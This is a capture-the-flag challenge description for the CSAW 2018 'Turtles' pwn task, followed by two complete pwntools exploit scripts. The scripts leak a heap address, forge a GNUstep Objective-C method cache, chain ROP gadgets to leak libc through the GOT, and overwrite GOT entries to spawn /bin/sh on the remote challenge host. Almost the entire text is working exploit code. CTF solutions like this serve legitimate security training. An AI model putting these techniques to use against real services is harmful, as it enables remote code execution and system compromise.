Looks like you found a bunch of turtles but their shells are no where to be seen! Think you can make a shell for them?
Install docker and make sure port 8024 is open
./setup.sh ./run.sh
Provide them with libs folder and turtles binary
#!/usr/bin/env python2 # coding: utf-8 from pwn import * import itertools IP = "pwn.chal.csaw.io" PORT = 9003 context.log_level = 'DEBUG' context.terminal = ['tmux', 'splitw', '-h'] context.arch = "amd64" mode = args['MODE'].lower() binary = "./turtles" def r(x): return io.recv(x) def ru(x): return io.recvuntil(x) def rud(x): return io.recvuntil(x, drop=True) def se(x): return io.send(x) def sel(x): return io.sendline(x) def pick32(x): return u32(x[:4].ljust(4, '\0')) def pick64(x): return u64(x[:8].ljust(8, '\0')) if mode == "remote": context.noptrace = True io = remote(IP, PORT) libc = ELF("./libs/libc.so.6") binary = ELF("./turtles") one_gg = 0x4f322 padding = 0 else: io = process(binary) proc_base = io.libs()[ "/home/vagrant/DongFeng/CSAW18/pwn/turtles/turtles"] libc_bb = io.libs()['/lib/x86_64-linux-gnu/libc-2.23.so'] libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") binary = ELF("./turtles") one_gg = 0xf02a4 padding = 0x10 # io.recvline() rud("Here is a Turtle: ") data = io.readline().strip() leaked = int(data, base=16) print "leaked address: ", hex(leaked) gdb.attach(io, ''' b *0x{:x} c '''.format( # 0x0000000000400C57, # read # 0x0000000000400C72, # memcpy # 0x0000000000400C85, # _objc_msg_lookup 0x0000000000400C9B, # call rax ) ) def calc(target): pass # gadget: 0x0000000000400d36 """ .text:0000000000400D36 48 83 C4 08 add rsp, 8 .text:0000000000400D3A 5B pop rbx .text:0000000000400D3B 5D pop rbp .text:0000000000400D3C 41 5C pop r12 .text:0000000000400D3E 41 5D pop r13 .text:0000000000400D40 41 5E pop r14 .text:0000000000400D42 41 5F pop r15 """ rdx_ = p64(0) + p64(leaked + 0x10 + 0x48) + p64(0x0000000000400d36) + "B"*0x10 + \ p64(0xaa) + p64(0)*2 + p64(leaked + 0x10) address_of_target_2 = p64(0x0000000000400d36) payload = p64(leaked+0x10) + p64(0) + rdx_ + address_of_target_2 #+ address3 #x86_64 particular gadget, may be can be finded on any ELF64 binary general_gg1 = 0x0000000000400D36 general_gg2 = 0x0000000000400D20 def ropfunc(function, arg1=0, arg2=0, arg3=0): padding = "" padding += p64(general_gg1) padding += "P" * 8 padding += p64(0) padding += p64(1) padding += p64(binary.got[function]) padding += p64(arg1) padding += p64(arg2) padding += p64(arg3) padding += p64(general_gg2) padding += "P" * 0x38 return padding rop = ROP("./turtles") rop.printf(binary.got["setvbuf"]) shellcode = rop.chain() shellcode += ropfunc("read", 16, binary.got["setvbuf"], 0) shellcode += ropfunc("setvbuf", 0,0, binary.got["setvbuf"] + 8) # as system("sh") payload += shellcode sel(payload) pause() leaked2 = io.recvrepeat(timeout=2) leaked2 = u64(leaked2.ljust(8, "\x00")) libc.address = leaked2 - libc.symbols["setvbuf"] print "[+] leaklib: ", hex(libc.address) sel(p64(libc.symbols["system"]) + "/bin/sh\x00") io.interactive()
# # Turtles CSAW 2018 Solution # _____ ____ # / \ | o | # | |/ ___\| # |_________/ # |_|_| |_|_| # from pwn import * context.log_level = "DEBUG" p = remote("pwn.chal.csaw.io", 9003) pause() elf = ELF("turtles") heap_leak = int(p.recv().split("\n")[0].split(": ")[-1].strip(), 16) print "[+] Heap Leak: ", hex(heap_leak) # libc offsets # magic_libc_offset: found with one_gadget (https://github.com/david942j/one_gadget) # this magic gadget is equivalent to execve("/bin/sh", 0, envp) which saves us the # step of having to find/write "/bin/sh" into the progrma magic_libc_offset = 0x41320 printf_libc_offset = 0x50cf0 # various rop gadgets found with rp++ (https://github.com/0vercl0k/rp) # 0x00400ec3: fsave [rbp-0x16] ; add rsp, 0x08 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret ; addespppppppr = 0x00400ec6 # 0x00400d5f: pop rax ; ret ; prax_r = 0x00400e5f # 0x00400d43: pop rdi ; ret ; prdi_r = 0x00400d43 # 0x00400d41: pop rsi ; pop r15 ; ret ; prsi_pr = 0x00400d41 # 0x00400cdb: pop rbp ; ret ; (1 found) prbp_r = 0x00400cdb # format string for leaking out bytes from program print_llu = " %500s" print_llu_int = int("000a" + "".join([hex(ord(c))[2:] for c in print_llu][::-1]), 16) # payload to be sent to program # we use our heap leak to setup a fake objc method cache # an attack which is described here (http://phrack.org/issues/66/4.html) # but adapted to the cache that gnustep objc dictates. objc_msg_lookup for # gnustep can be found here: # (https://github.com/gnustep/libobjc/blob/master/sendmsg.c#L275) # this does the cache lookup and is ultimately the thing being exploited # *rdi payload = p64(heap_leak - 0x40 + 0x8) # *(*rdi + 0x40) payload += p64(heap_leak + 0x10) # *(*(*rdi + 0x40)) payload += p64(heap_leak - 0x320 + 0x40) payload += p64(print_llu_int) # 0x00400d3d: pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret ; payload += p64(0x00400d3d) payload += p64(heap_leak + 0x50 - (1 * 0x8)) # Null for printf to return 0 bytes written payload += p64(0) # *(*(*rdi + 0x40) + 0x28) payload += p64(0xca0) payload += p64(heap_leak - 0xa8 + 0x48) # 0x00400d36: add rsp, 0x08 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 # ; pop r15 ; ret ; payload += p64(0x00400d36) # we construct our rop chain to: # 1) Call printf with an empty string to get rax to be 0 # 2) leak out the got address of printf using the format string " %500s" # 3) read our calculated libc magic address back into the printf got # 4) call the "printf" function, which is now pointing to code in libc # that will spawn a shell for us memcpy_ow_addr = elf.got['memcpy'] + 0x830 print_llu_addr = heap_leak + (24 * 0x8) print_null_addr = heap_leak + 0x30 rop_chain = "".join(map(p64, [ 0xdeadbeefcafebabe, 0x1337133713371337, prdi_r, print_null_addr, elf.plt['printf'], # put 0 in rax prdi_r, print_llu_addr, prsi_pr, elf.got['printf'], 0, elf.plt['printf'], # leak bytes prbp_r, memcpy_ow_addr, 0x400c43, # 00400c43 lea rax, [rbp-0x830 {var_838}] print_llu_int, ])) payload += rop_chain p.send(payload) # using the leaked got address, calculate the actual address # of the magic jump printf_got_leak = u64(p.recv().strip() + "\x00\x00") libc_base = printf_got_leak - printf_libc_offset magic_addr = libc_base + magic_libc_offset p.send(p64(magic_addr)) # wait for our shell p.interactive()